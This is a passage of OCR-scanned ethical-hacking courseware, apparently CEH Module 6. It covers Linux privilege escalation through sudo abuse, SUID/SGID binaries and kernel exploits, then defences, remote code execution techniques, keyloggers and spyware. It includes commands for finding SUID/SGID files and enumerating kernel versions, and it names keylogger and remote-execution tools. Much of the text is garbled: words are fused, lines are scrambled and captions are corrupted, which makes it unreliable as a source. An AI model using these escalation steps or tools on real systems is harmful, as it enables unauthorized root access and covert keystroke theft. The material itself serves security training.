an attackercan perform privilegeescalationbyexploitinglocalsystemvulnerabilities.
After escalating privileges,an attackercan install malicioussoftware,change user

permissions, addor remove users,stealcredentials, reademails,etc

‘Abusing
SudoRights
Sudo(substituteuser do)is a UNIX- andLinux-basedsystemutilitythat permitsusers to
run commands as a superuser or root byusingthe security
privilegesof anotheruser.
/etc/sudeers file includesthe configuration
‘An of sudo rights.Thisfile contains
detailed informationregarding access permissions,includingcommandsthat are
allowedto run
or
with without passwords
per user
Attackerscan abusesudoto escalatetheir privileges
or group.
to run programsthat the normal
usersare not allowedto run. For example, if an attackerhassudo-rightsto run a ep
‘commandthen he/she c an overwrite an /etc/sudoers or /etc/shadow file with
his/her own maliciousfile. Byoverwriting the content of the sudoersfile,he/she c an
edit the permissions
to run various restrictedcommands to launchfurther
or programs
attackson the system,

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Abusing
SUIDandSGIDPermissions
SetUserIdentification(SUID) Identification(SGID)
andSetGroup are accesspermissions
given to a programfile inUNIX-basedsystems. Thesepermissions usually
allow the
users on the systemto run @ programwith temporarilyelevatedprivilegesor root
privileges
to execute a task.Thefiles with SUID and SGID rights
particular run with
higherprivileges.
In Linux, andbinariesthat can be executedbythe attackers
there are some commands
to elevatetheirprivileges
from non-root users to root users, if flags
of SUIDand SGID
rightsare set. Someof the executablecommandsthat can be usedbyattackersto
spawna shellandescalateprivilegesare Nmap, vim, less, more, Bash, Cat, cp, echo,
find, Nano, etc.
Attackerscan use the followingcommands to find SUID and SGID files i n the target
system:
# FindSUID
find / -perm -u=s -type £2>/dev/null
Find GUID
find / -perm -g=s

-type £2>/dev/null
KernelExploit
Kernelexploitsreferto
execute arbitrary
commands
kernelvulnerabilities,
programs
exploit
vulnerabilities
that can
to
or codewith higher
attackers
privileges.
i n thekernel
present
Bysuccessfully
can attain superuseror root-level
exploiting
accessto the target
system.To run a kernelexploit,attackersmust have configurationdetailsof the target
system.
use the following
‘Attackers commands to obtaindetailssuchas the OS,kernelversion,
andarchitectureof the targetsystem:
#08

#
cat
Kernel
version
/etc/issue
# Architecture
cat /proc/version
Attackerssearchhttps://www.exploit-db.com
and execute Python
scriptssuch as
linprivchecker.py forescalating
to detectkernelexploits privileges.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Escalation Tools
Privilege CEH

EscalationTools
Privilege
Privilege
escalationtools suchas BeRoot,
to run a configuration
attackers
underlyingvulnerabilities,
assessment
linpostexp,
services,file anddirectory
Windows
Exploit
Suggester,
systemto find information
on a target
etc. allow
aboutthe
permissions,kernelversion, architecture,
etc. Usingthis information,attackerscan further find a way to exploit and elevatetheir
privileges
on the targetsystem.
=
BeRoot
Source:https://aithub.com
BeRooti s a post-exploitation c ommon misconfigurations
tool to check to finda wayto
escalateprivilege.
shownin the
‘As screenshot,
usingthis tool,attackerscan obtain informationabout
service writeabledirectories
permissions, with their locations,
permissionson startup
keys,
ete.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 694:
Figure Screenshot
of Boot showing
service permissions

ical andCountermensores
Mackin ©by E-Comel
Copyright
+
linpostexp
6
Figure95:Screenshot
ofBeRoot
showing
Startup and Taskscheduler
keys permissions

Source:https://github.com
The linpostexptool obtainsdetailedinformationo n the kernel,
whichcan be usedto
escalateprivileges
on the targetsystem,
showni n the screenshot,
‘As using this tool,attackerscan obtaininformationaboutthe
kernel,filesystems,superuser,sudoers, sudoversion, etc, Attackerscan use this
informationto exploitvulnerabilitiespresenti n the kernelto elevatetheir privileges.
Thefollowing commandis used to extract this informationaboutthe targetsystem:
python linprivchecker.py
ical andCountermensores
Mackin ©by E-Comel
Copyright
 ure
6 of
97:Screenshot showing
linpostexp user, andenvironmental
lesystem, info

6
Module 682
Page tical andCountermensores
Making Copyright©
by Comet
 How to DefendAgainst Escalation
Privilege
FEBneteracve logon
esc prises senstie
ata,

run sericesas
frapplleation
bugs coding
eros
unpaged
erege accounts Testhesstem
and hero

aprvlege
ofseparation
Implement
{olimtthespe
methodloey
nd
pogrommingerros Regular theernel
and update
pateh

i}
How to Defend Against
Privilege
Escalation (Cont'd)
C/EH
cn he
et Coleg
[: eceeteraieeieeaed

How to DefendAgainst PrivilegeEscalation

The bestcountermeasure againstprivilegeescalationis to ensure that users havethe lowest
possible
privileges
still adequate effectively.
to use their system In thiscase,even if an attacker
succeedsi n gainingaccess to the low-privileged account,he/she will not be able to gain
administrative-levelaccess. Often,flaws i n programming code allow suchescalationof
privileges
on a targetsystem. Asstatedearlier,an attacker
can gainaccessto the networkusing
@non-administrativeaccount andthen gain the higher

ical
ofan
privilege administrator.
andCountermensores ©
Mackin by E-Comel
Copyright
The
following
=
are thebestcountermeasuresto defend
Restrictinteractive logon
privileges
against
escalation:
privilege

‘=
Runusers andapplications
withthe lowestprivileges
+
Implement multi-factorauthenticationandauthorization
Runservicesas unprivilegedaccounts
Implement a privilege
separationmethodology to limit thescopeof programming
e rrors
andbugs
technique
Usean encryption to protectsensitive data
Reducetheamount ofcodethat runs witha particularprivilege
Performdebugging
usingboundscheckers
andstresstests
for application
Testthe system coding
errors andbugs
thoroughly
Regularly
patchandupdate
the kernel
Change to “Always
UACsettings Notify,―
so that it increases the visibility
of the user
whenUACelevationis requested
filesto thesearchpaths
Restrictusers fromwriting for applications
Continuously monitor
filesystem
theprivileges
Reduce
usingauditing
permissions tools
of user accountsandgroupsso thatonlylegitimate
administrators
canmakeservice changes
Use whitelistingtools to identify and block malicioussoftwarethat changes
file,
directory,
or service permissions
Usefullyqualifiedpathsi n all Windowsapplications
Ensurethatall executables
are placed
i n write-protected
directories
plistfilesfrombeing
in Mac 05s,prevent alteredbyusers bymaking
themread-only
Blockunwantedsystem
utilitiesor software
that maybeusedto scheduletasks
Regularly
patch
andupdate
theweb servers
+

=
Disable
default
local
Detect,
oraccount
the administrator
repair,andfix anyflaws errors runningi n the system
services

Defendagainstabusing sudorights:
Implementa strongpassword forsudousers
policy
=
Turnoff password caching bysettingthe timestamp_timeout to 0, so that everytime
sudois executedusers must inputtheir password
Separate sudo-leveladministrativeaccountsfromthe administrator's regular
accounts,
to preventstealing
of sensitive passwords

ical andCountermensores
Mackin ©by E-Comel
Copyright
 =
Update andaccountsat regular
user permissions intervals
‘=
Testsudouserswith accessto programs
containing for arbitrary
parameters code
execution

Module
6 68S
Page tical andCountermensores
Making Copyright©
by Comet
 Toolsfor Defending
againstDLL and DylibHijacking
Dependency
Walker DylibHijackScanner
13
¢H
|@ Oy jac Scanner
simple
that
ty wl san your

Tools for Defending DLL and DylibHijacking

against
Cybersecurity
professionals
can use toolssuchas Dependency Walker, DLLHijackAuditKit,and
DLLSpyto detectandpreventprivilegeescalationusingDLLhijacking. toolssuchas
In addition,
DylibHijack
Scannerhelpsecurityprofessionals
to detectandprevent privilege
escalationusing
Dylibhijacking
X
on OS systems.
for modifying,
Thesetoolshelpsecurity
moving,renaming,or replacing
DLLs
professionals
or dylibs to
monitor system
in the systems.
files

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Dependency Walker
Source:http://www.dependencywalker.com
DependencyWalkeris usefulfor troubleshooting
systemerrors relatedto loading
and
modules.It detectsmanycommon application
executing problems, suchas missing
modules, invalidmodules, import/export
mismatches,
circulardependency errors, etc.
showni n the
‘As screenshot, professionals
cybersecurity use Dependency Walkerto
verifyall the DLLsusedbyan application, the locationfromwhichDLLsare loaded,
missingDLLs, etc. Thisinformationhelps professionals
security to detect,patch,andfix
misconfigured
DLLsi n the systems.

[re At
Atlan
[Waring itone
eqared
onengl
dyor
orwarded
iad dependency
mse ws
war
otwt
ose
dependency
To

698:
Figure Screenshot
of Dependency
Walker

ical andCountermensores
Mackin ©by E-Comel
Copyright
 *
_Dylib
HijackScanner
Source:https://objective-see.com
DylibHijackScanner(DHS)
is a simpleutilitythat will scan your computerfor
applications
thatare eithersusceptible
to dylib
hijacking
or havebeenhijacked.
showni n the screenshot,
‘As securityprofessionals
use DHSto detectapplications
that
havebeenhijacked or are vulnerableto dylib
hijacking.
Thisinformationhelps
them to
patchandfixtheseapplications

699: Scanner
Figure Screenshot
of Oylis
Hijack

Module
6 688
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
 andMeltdownVulnerabilities
againstSpectre
Defending

Au pth verb
sotvare
a ach towne

occ
s erves
andpins tt sow speed
ero

Eh 00s reve ston pee age ofca nomatin fom rene menay

Defending
against andMeltdown Vulnerabilities
Spectre
Variouscountermeasures to defend privilege
escalationattacksthat exploitSpectre
Meltdown
vulnerabilities
as
follows: are

Regularly
‘=

=
OSs
and
monitoring
of
andupdate
patch
applications
services
Enablecontinuous
firmware
critical and runningon the system
andnetwork
Regularly
patchvulnerable
software
suchas browsers
Installandupdate
ad-blockers
andanti-malwaresoftwareto blockinjection
of malware
through
compromised
websites
Enabletraditionalprotectionmeasures suchas endpoint
securitytools to prevent
unauthorized
system access
Blockservices andapplications
that allowunprivileged
users to execute code
Never installunauthorized
softwareor access untrustedwebsitesfrom systems
storing
sensitive information
Usedatalossprevention(DLP)
solutionsto preventleakage
of criticalinformationfrom
runtime memory
checkwith the manufacturer
Frequently for BIOSupdates
and followthe instructions
provided
to
bythe manufacturer installthe updates

ical andCountermensores
Mackin ©by E-Comel
Copyright
 and Meltdown Vulnerabilities
Spectre
Tools for Detecting

TInspectre Spectre
& MeltdownChecker

Tools for Detecting andMeltdown Vulnerabilities

Spectre
Security professionals
can use toolssuchas InSpectre,Spectre
& MeltdownChecker,INTEL-SA-
00075Detectionand Mitigation Tool, andMeltdownvulnerabilities
etc. to detectSpectre that
exist i n the systemhardware.Detectionof thesevulnerabilitiesbefore exploitation
helps
security professionals
to installthe necessary OSand firmware
patchesto defendagainst
such
exploitation,
=
InSpectre
Source:https://www.gre.com

Inspectre examines and disclosesany Windows system’shardwareandsoftware

capability
to preventMeltdownand Spectre attacks.Detectingthesevulnerabilitiesat
a n early
stagehelps professionals
security to update systemhardware, its BIOS,which
reloadsthe updated firmware,
processor andits OSto use the new processorfeatures.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Spectre
Infpecte: Check
Metdown
and Prtecton

sriprocessorharore
InSpectre sey.
Spectre
& MeltdownVulnerability
Status
systemMtdownprotected:
is NO!
‘System
is Spectre
protected:NO!
MicrocodeUpdateAvailable
Performance:GOOD
CPUID:306¢3

Figure6200: showing
Screenshotof nspectre andMeltdown
Spectre vulnerabilities
& MeltdownChecker
Spectre
Source:https://github.com
Spectre & MeltdownChecker is a shellscriptto determine whethera systemis
vulnerableagainst various “speculative
execution― the script
CVEs.For Linux systems,
will detect mitigations, includingbackported non-vanillapatches, regardless of the
advertisedkernelversion numberor the distribution(such as Debian,Ubuntu,CentOS,
RHEL,
‘As
Fedora,
openSUSE,
Arch,
etc.)
shownin the screenshot, securityprofessionals
use Spectre& MeltdownCheckerto
determine
tool helps
place.
whether the system
them in verifying
is immune to speculative
execution vulnerabilities.This
whetherthe systemhasthe knowncorrect mitigations in

ical andCountermensores
Mackin ©by E-Comel
Copyright
 6201:
Figure
of Checkershowing
Screenshot Spectre&Meltdown Spectre
and
Meltdown
vunerabilti

6102: &Meltdown
Figure
showing
and
Meltdown
Screenshotof Spectre Checker Spectre vulnerabiltie:
 ModuleFlow

1 3 EscalatingPrivileges
System
Hacking
Concepts

B® came
e
Access
Maintaining
Aftergaining access and escalating on the targetsystem,
privileges now attackerstry to
maintain their access for further exploitation
of the targetsystem or makethe compromised
systema launchpad fromwhichto attackother systems remotely
i n the network.Attackers
execute maliciousapplicationssuchas keyloggers, spyware, and other maliciousprograms to
maintain theiraccessto thetargetsystem andstealcriticalinformationsuchas usernamesand
passwords. Attackershidetheir maliciousprograms or filesusing rootkits,
steganography,
NTFS
their
datastreams,etc. to maintain
access
to thetargetsystem.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Executing
Applications
|G Whenattackers executemalicious “owning―
its called
applications thesytem
|G. Theattacker
executesmaliciousprogramsremotely
the
inthevictim'smachine t o gather information
that
access t o sytem resources, crackthe password,

to
otation or loss
of privacy gainunauthorized
thescreenshots,instalbackdoor maintaineas access, et.
capture

Programs
‘Malicious that
Attackers
Execute on TargetSystems

Spyware

Executing
Applications
Onceattackersgainhigher privileges
in the targetsystem bytryingvarious privilegeescalation
attempts,theymayattemptto execute a maliciousapplication byexploitinga vulnerability
to
execute arbitrary code.Byexecuting malicious applications, the attackercan steal personal
information, gain unauthorizedaccess to systemresources, crack passwords, capture
screenshots, install abackdoorformaintaining easyaccess, etc.
Attackersexecute maliciousapplications at this stage i n a processcalled“owning―
the system.
Oncetheyacquireadministrativeprivileges, theywill execute applications. Attackersmayeven
tryto do so remotely on the victim'smachine to gather the same informationas above.
‘The
maliciousprograms
attackersexecute on targetsystems
can be:
=
Backdoors: designed
Program to deny disrupt
leadsto exploitation
the
or operation,
gather
or lossof privacy, or gain unauthorized
access to system
resources.
information
that

Crackers:Components of softwareor programsdesigned for crackinga code or

passwords.
Keyloggers:
Thesecan behardwareor software.In either case,the objective
is to record
eachkeystroke
madeon the computerkeyboard.
Spyware:
Spysoftwaremaycapturescreenshots andsendthemto a specified location
definedbythe hacker.For this purpose,attackershave to maintain access to victims’
computers. After derivingall the requisiteinformationfromthe victim'scomputer, the
attackerinstallsseveralbackdoors to maintain easyaccess to it i n the future.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 RemoteCodeExecutionTechniques

Remote Code Execution Techniques

Remotecodeexecution techniquesare various tacticsthat can beusedbyattackersto execute
maliciouscodeon a remote system.

network.
and furtherexpanding
a systeminitially are
Thesetechniquesoften performed
access to remote systems
after compromising
presento n the target

Someexamples
of remote codeexecution techniques
are as follows:
‘=
Exploitation
forClientExecution
Insecure codingpracticesi n software can
make it vulnerable to various attacks.
Attackerscan exploit vulnerabilities
theseunderlying in software
through focusedand
targeted with an objective
exploitations of arbitrary
codeexecution to maintain access
tothetargetremote system
Differenttypesof exploitations
for clientexecution are as follows:
© Exploitation
Web-Browser-Based
Attackers targetweb browsers through spearphishing links and drive-by
compromise.The remote systemsc an be compromised throughnormalweb
browsingor through severalusers who are targetedvictims of spearphishing
linksto
sites usedto exploit
attacker-controlled the web browser. Thistypeof exploitation
doesnot needuser intervention for execution,
Office-Applications-Based
Exploitation
Attackerstargetcommon officeapplicationssuch as MicrosoftOfficethrough
different variants of spearphishing.
Emailscontaining
links to maliciousfiles are

ical andCountermensores
Mackin ©by E-Comel
Copyright
 directly for downloading.
sent to the end-users To run the exploit,
end-usersare
required
to open a malicious

‘Third-Party
document
Applications-Based
file. or
Exploitation
can alsoexploitcommonly
‘Attackers usedthird-party
applications
deployed
as part
of the software.Applicationssuchas AdobeReader,
Flash,
etc. are usually
targeted
byattackers to gainaccessto remote systems,
ScheduledTask
Scheduledtasks allow users to performroutine tasks chosenfor a computer
automatically.Thereare two utilities,at and schtasks,that can be usedalong with
WindowsTaskScheduler to execute specific
codeor scriptat a scheduled
dateandtime.
Using task scheduling,attackerscan executemalicious programsat system startup,
or
scheduleit for a specificdate and time to maintain accessto the targetsystemand
further perform r emote code execution to gain admin-levelprivileges
to the remote
system.
ServiceExecution
System services are programs
run binary
as
filesor commands
that run and operate
thatcan communicatewithWindowssystem
Thiscodeexecution technique
ServiceControlManager.
of
at the backend an OS.Attackers

is performed
services such
bycreating a
new service or bymodifying service at the time of privilege
an existing escalationor
maintaining
access (WMI)
WindowsManagement
Instrumentation
WMI is a featurei n Windows administrationthat managesdata and operations on
WindowsOSsand provides a platform for accessingWindowssystem resources locally
andremotely. Attackers can use the WMI featureto interact with the targetsystem
remotely,and use it to performinformationgathering on systemresources andfurther
execute codefor maintaining

Windows (WinRM)
RemoteManagement
to
access the targetsystem

WinRMis aWindows-based protocoldesigned

to allowa user to run an executablefile
to modify systemservices andthe registry on a remote system. Attackerscan use the
winzm
command to interact with WinkMandexecute a payload
as a partof lateralmovement.
on the remote system

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Toolsfor Executing
Applications
‘ar
|

roapepoy

Tools for Executing Applications

Toolsusedfor executing applications
remotely helpattackersperform various malicious
activities on the targetsystems.
Aftergainingadministrative privileges,
attackers u se these
toolsto install,execute, and/or
delete, modifythe restrictedresourceson the victim machine.
+
Remotexec
Source:https://www.isdecisions.com
RemoteExec remotely executesprograms/scripts,
installsapplications, andupdates files
and folderson Windowssystems throughoutthe network.Thisallowsan attackerto
modify change
the registry, localadminpasswords, disablelocalaccounts,and copy/
update/deletefilesandfolders.
shownin the
‘As attackersuse the RemoteExectool to remotely
screenshot, execute

the
target
filesbyselecting
and
the OS file to beexecuted.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure6.208
Screenshot
ofRemote
Someof the privilege
escalationtoolsare listedas follows:
*
(https://aithub.com)
Pupy
+
PDQDeploy
(https://www-pda.com)
+
Dameware (https://www.dameware.com)
RemoteSupport
Manage€ngineCentral(https://www.manageengine.com)
Desktop
PsExec(https://docs.microsoft.com)

Module
Page 6 698
tical
Making
and by CountermensoresCopyright©
Comet
 Keylogger
"ero oe
ara arr
teres 8
eee st mantr ach tobe a he eon EE om

sh ong
1 Leginr
ppeton nce fe snl tng tment employee ate ea

(alow
«rps
nace
we
eet
een
ped inrmton
th ln
thera
women
ath
sod

opting tm
ating et chara

a OS
& —— Beene

a
=

Keylogger
Keyloggers
are softwareprograms or hardwaredevicesthat recordthe keys struckon the
keyboard
computer (alsocalledkeystroke logging)
of an individualcomputer user or a network
You can view all the keystrokes
of computers. of the victim'scomputer at any time in your
systembyinstalling
thishardwaredeviceor program.It recordsalmostall the keystrokes on a
keyboard
of a user and saves the recordedinformationin a text file. As keyloggers hide their
and interface,
processes the targetis unaware of the keylogging. Officesand industriesuse
keyloggers
to monitor employees’computeractivities, and theycan alsobe usedin home
environments for parents
to monitor children’s
Internet activities.
=~

= (| 2.5.
2 OF
Ze a
==

oe

Figure
6.104:Demonstration
of keylogger
A keylogger,
when associatedwith spyware, helps to transmit a user'sinformationto an
unknownthird party.Attackersuse it illegally
formaliciouspurposes,suchas stealing sensitive
and confidentialinformationabout victims. This sensitive informationincludesemail IDs,
passwords,banking details,chatroom activity,Internetrelaychat(IRC},
instant messages, and
bankand creditcardnumbers.Thedatatransmittedover the encrypted Internet connection

Module
6 629
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
are also vulnerable to keylogging becausethe keylogger tracksthe keystrokesbefore
encryption.
keylogger
‘The systeminvisibly
programis installedonto the user’s throughemailattachments
or “drive-by―
downloadswhen users visit certain websites.Physical
keystrokeloggers“sit―
betweenkeyboard
hardwareandthe OS,so that theycan remain undetectedandrecordevery
keystroke.
A keylogger
can:
=
typed
Recordevery keystroke on theuser'skeyboard

at regular
Capture screenshots showing
intervals, suchas typed
user activity characters.
or clickedmouse buttons
Trackthe activities of users bylogging
Windowtitles,names of launchedapplications,
andotherinformation
Monitor the onlineactivityof users byrecording
addresses
of the websitesvisitedand
with keywords
entered
Recordall login names, bankandcreditcardnumbers, including
andpasswords, hidden
passwords or datadisplayed
in asterisks
or blankspaces.
Recordonlinechatconversations
Makeunauthorizedcopiesof both outgoing
andincomingemailmessages

ical andCountermensores
Mackin ©by E-Comel
Copyright
 of Keystroke
Types Loggers

res——t— eons erat

of Keystroke
Types Loggers
A keylogger is a hardwareor softwareprogram that secretly
recordseachkeystroke on the user
keyboard at any time. Keyloggers save capturedkeystrokesto a file for readinglater,or
transmit them to a place wherethe attackercan access it. Astheseprogramsrecordall the
keystrokes that are provided througha keyboard,theycan capturepasswords, creditcard
numbers, email addresses, names, postaladdresses,and phone numbers.Keyloggers can
captureinformationbefore itis encrypted.
Thisgivesthe attackeraccess to passphrases and
other“well-hidden―
information,

——_|
Lm
rcjuos

nee
‘gone =

ical andCountermensores
Mackin ©by E-Comel
Copyright
 are two typesof keystroke
‘There hardwarekey
loggers: andsoftwarekeyloggers.
loggers Both
typeshelpattackersto recordall keystrokes
enteredon the target
system.
HardwareKeystroke Loggers
keyloggers
Hardware are hardware
devices
thatlooklikenormalUSBdrives.Attackers
can connect these keyloggers
betweena keyboard
plugand a USBsocket.All the
keystrokes
bytheuser are storedi n the hardware
unit. Attackersretrieve thishardware
unit to access the keystrokes
that are storedi n it. The primary advantage
of these
loggers antivirus,or desktop
is that no anti-spyware, programcan detectthem.
security
Theirdisadvantage
is the easydiscovery
of their physical
presence.
Thereare threemain typesof hardwarekeystroke
loggers:
>
PC/BIOS Embedded
BlOS-levelfirmwarethat is responsible for managingkeyboard actions can be
modifiedin sucha way that it capturesthe keystrokes
that are typed. It requires
physical
and/or admin-level
accessto the targetcomputer.

Keylogger
Keyboard
If the hardwarecircuit is attachedto the keyboard cableconnector,i t can capture
the keystrokes.
beaccessed
‘can
keylogger
It recordsall the keyboard
later.Themain advantage
is that it is not OS dependent
strokesto its own internal

a
of hardwarekeylogger
and,hence,
memorythat
over a software
will not interferewith any
applications running on the targetcomputer, and it is impossible to discover
hardwarekeyloggers byusinganyanti-keyloggersoftware.
Keylogger
External
External are attachedbetweena standardPCkeyboard
keyloggers and a computer.
They
recordeachkeystroke.
Externalkeyloggers
do not needany softwareandwork
with anyPC.Youcan attachone to yourtargetcomputerandmonitor the recorded
informationon your PCto look through the keystrokes.
Thereare four typesof
externalkeyloggers:
*
PS/2andUSBKeylogger: Thisis completely
transparent
to computeroperation
andrequiresno softwareor driversfor functionality.
It recordsall the keystrokes
typed
bythe user on the computer keyboard,and stores data suchas emails,
chatrecords, used,IMs,etc.
applications
Acoustic/CAM Acoustic keyloggers
Keylogger: work on the principleof
electromagnetic
converting sound waves into data. They
employ either a
capturing of converting
receiver capable the electromagnetic
soundsinto the
keystroke
data,ora CAM (camera) capable
of recording screenshots
of the
keyboard.
BluetoothKeylogger:
Thisrequiresphysical
accessto the targetcomputeronly
once, at the time of installation.After installationo n the targetPC,
it stores all

ical andCountermensores
Mackin ©by E-Comel
Copyright
 the keystrokes
and you can retrieve the keystroke
information
i n real-time
by
via a Bluetoothdevice.
connecting
Wi-FiKeylogger: BesidesstandardPS/2 and USBkeylogger functionality,
this
remote accessover theInternet,Thiswirelesskeylogger
features will connect to
a localWi-Fiaccess pointand sendemailscontaining the recordedkeystroke
data.Youcan alsoconnect to thekeylogger andview the
at anytime over TCP/IP
captured
log.
SoftwareKeystroke
Loggers.
Theseloggers are thesoftwareinstalledremotelyvia a networkor emailattachment i n
a targetsystem for recording Here,the logged
all the keystrokes. informationis stored
as a log
file on a computer harddrive.Thelogger sendskeystroke logsto the attacker
using emailprotocols. Softwareloggers can often obtain additionaldata as well,
because theydo not havethe limitationof physical memory allocation,
as do hardware
keystroke
loggers.
Thereare four typesof softwarekeystroke
loggers:
©. Application
Keylogger
application
‘An keylogger
allowsyou to observeeverything
the user i n his/her
types
emails,chats,
and other applications,
including
passwords.
It is even possible
to
trace recordsof Internet activity. Thisis an invisiblekeylogger to trackand record
everything happening withinthe entire network
Kernel/Rootkit/Device DriverKeylogger
Attackersrarely use kernelkeyloggers because theyare difficultto write andrequire
a high levelof proficiency fromthe keylogger developers.Thesekeyloggers existat
the kernellevel.Consequently, theyare difficult to detect,especially for user-mode
applications. Thiskindof keylogger acts as a keyboard devicedriverandthus gains
to all informationtyped
‘access o n the keyboard.

The rootkit-basedkeylogger
is a forged
Windowsdevicedriver that recordsall
keystrokes.Thiskeylogger
hidesfromthe systemand is undetectable,
even with
standardor
dedicated
tools.
Thiskind of keylogger usually
acts as a devicedriver. Thedevicedriver keylogger
replaces the existing1/O driverwith the embeddedkeylogging functionality,
This
keylogger saves all the keystrokesperformed on the computer into a hiddenlogon
file,andthensendsthefile to thedestinationthrough the Internet.
Hypervisor-Based
Keylogger
A hypervisor-based
keylogger
workswithin a malwarehypervisor
operating
on the
os,

ical andCountermensores
Mackin ©by E-Comel
Copyright
Form-Grabbing-Based
Keylogger
A form-grabbing-basedkeylogger
recordsweb formdataand then submitsit over
after bypassing
the Internet, HTTPSencryption.Form-grabbing-based
keyloggers
log
forminputsbyrecording
‘web web browsing event―
on the “submit function.
JavaScript-Based
Keylogger
AttackersinjectmaliciousJavaScript tags o n the web page of a compromised
websiteto listento keyevents suchas onkeyUp() andonKeyDown(). Attackers use
various techniques suchas man-in-the-browser, cross-sitescripting,
etc. to inject

malicious
script.
Keylogger
Memory-Injection-Based
Memory-injection-based
keyloggersmodifythe memorytablesassociatedwith the
web browserand systemfunctionsto logkeystrokes.
Attackersalso use this
technique
to bypass
UACin Windowssystems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 HardwareKeyloggers

KEYGRABBER
CLASSIC
USB.

Hardware Keyloggers
Wenow examine the detailsof externalhardwarekeyloggers. previously,
Asdiscussed there
typesof externalhardwarekeyloggers
are various availableo n the market.Thesekeyloggers
are plugged
in linebetweena keyboard
anda computer.
‘These of keyloggers
types include:
=

=
PS/2
keylogger
USBkeylogger
=

*
embedded
Keylogger
Bluetooth
keylogger the inside keyboard

=
keylogger
WiFi
Thesekeyloggers monitor and capture
+

Hardware
the keystrokes
keylogger
of the targetsystem.Astheseexternal
keyloggers attachbetweena usualPCkeyboard anda computerto record eachkeystroke,
they
will remain undetectablebythe anti-keyloggers
installedo n the targetsystem.
However,the
user can easilydetecttheirphysical
presence,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure
6.106:
Different keyloggers
yas ofhardware
Hardwarekeyloggers from
come numerous manufacturers and vendors,
some of which are

=
as
discussedfollows:
KeyGrabber
Source:https://www.keydemon.com
A KeyGrabber
hardware keylogger
is an electronicdevice capable of capturing
froma PS/2
keystrokes It comes in various forms,
or USBkeyboard. suchas KeyGrabber
KeyGrabber
USB, PS/2,
andKeyGrabber
Nano Wi-Fi

KEYGRABBER
CLASSIC
USB.

Hardware keylogger
bydefinition

6.107Screenshot
Figure of KeyGrabber
hardware
keylogger

ical andCountermensores
Mackin ©by E-Comel
Copyright
 keyloggers
Somehardware are listedas follows:
=
USB(http://www.keelog.com)
KeyGrabber
+
(http://www.keycarbon.com)
KeyCarbon
=
Keyllama
Keylogger
(https://Keyllama.com)
Keyboard
logger
(https://www.detective-store.com)
KeyGhost
(http://www.keyghost.com)

6
Modul Pag0707

tical
Making
and by
CountermensoresCopyright©
Comet
 forWindows
Keyloggers
eplopger |
your
ontario Pte nee
06 ena Montr
‘tin
ve Heeger

berEtmwre
Whe
for Windows
Keyloggers
the keyloggers
Besides mentionedpreviously,
there are many softwarekeyloggers
availableon
the market;you can use thesetoolsto recordthe keystrokes andmonitor the activityof
computer users. Somekeyloggers
are discussed
as follows.Youcan downloadthesetoolsfrom
websites.
their respective
=
Keylogger
Spyrix Free
Source:http://www.spyrix.com
SpyrixKeylogger Free is usedfor remote monitoring o n a computer that includes
recordingof keystrokes, andscreenshots.
passwords, Thiskeyloggeris perfectly
hidden
fromantivirus,anti-rootkit,
andanti-spywaresoftware.
Attackersuse the Spyrix Keylogger
Free tool to recordall the keystrokes
on the victim
froma remote system.
system

ical andCountermensores
Mackin ©by E-Comel
Copyright
Someof the keyloggers
Figure
of
6 108;Screenshotpyri Keylogger
for Windowsa re listedas follows:
=
REFOGPersonal
Monitor (https://www.refog.com)
All In One Keylogger
(http://www.relytec.com)
Elite (https://ww.elitekeyloggers.com)
Keylogger
Standard(https://www.staffcop.com)
StaffCop
(https://www.spytector.com)
Spytector

Module
6 702
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 for Mac
Keyloggers

for Mac
Keyloggers
Thereare various keyloggers
availableon the marketthat run on MacOS.Thesedownloadable
toolscan assistan attackeri n recording
keystrokes
andmonitoring activities.They
users’ enable
you to recordeverything suchas keystroke
the user doeson the computer, logging,recording
emailcommunication,
Thefollowing
keystroke
chatmessaging,
loggers
are specifically
taking
usedon MacOS:
of
screenshotseach activity,
andmore.

=
Refog
MacKeylogger
Source:https://www.refog.com
Refog Mac Keylogger provides undetectedsurveillanceandrecordsallthe keystrokeson
the computer. Asshownin the screenshot, the attackersuse the RefogMac Keylogger
user andstealcriticalinformationsuchas login
to recordall the activities of the target
credentials.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 GBvom see

©
wes
peo
@ saves
vane

@ sraem tts

Figure6109:
Screenshot
of Amac
Keylogger
Someof the keyloggers
for Macare listedas follows:
=
Keylogger
Spyrix For Mac 05 (http://www.spyrix.com)
Elite KeyloggerMac (https://www.elite-keylogger.net)
for
=
(https://www.easemon.com)
AoboMacOSX Keylogger
for MAC(http://kidlogger.net)
KidLogger
PerfectKeylogger
for Mac(https://www.blazingtools.com)

Module
6 741
Page tical MakingandCountermensores
by Comet
Copyright©
 Spyware

7
ts thea Tojan
Inert
horse,w hch usualy
for downlad hidden
bundled
asa
of programs
eeware
component tht can bearableon

Spyware
Propagation

Dive
by
downoad softwareinstaation
Pigybucked

browser
Web
vunerablty expos cookies

Spyware
Spyware is stealthy computer softwarethat allowsyou to secretly
monitoring recordall the
It automaticaly
computer.
user activitieson a target deliverslogs
to the remote attackerusing
the Internet (viaemail,FTP,commandandcontrolthrough encrypted HTTP,
traffic, DNS, ete.)
The deliverylogsincludeinformationaboutall areas of the system,suchas emailssent,
websitesvisited,every keystroke (includinglogins/passwords for Gmail,Facebook, Twitter,
Linkedin,
etc),file operations,andonlinechatconversations. It alsotakesscreenshots at set
interval,
Trojan just
like
horse,
downloaded
a surveillance
which is usually
camera aimed thecomputer
at monitor. Spyware
bundled as a hidden component
similar
of freewareor software
fromthe Internet.It hidesits process,files,andother objects to avoiddetection
is to
a
andremoval.Thisallowsan attackerto gather informationabout a victim or organization, such
asemailaddresses, user logins,
passwords, creditcardnumbers, banking credentials,etc.
=
Spyware Propagation
As its name implies,
spyware is installedwithout user knowledge andthis
or consent,
can be accomplished
by“piggybacking―
the spywareonto otherapplications.
Thisis
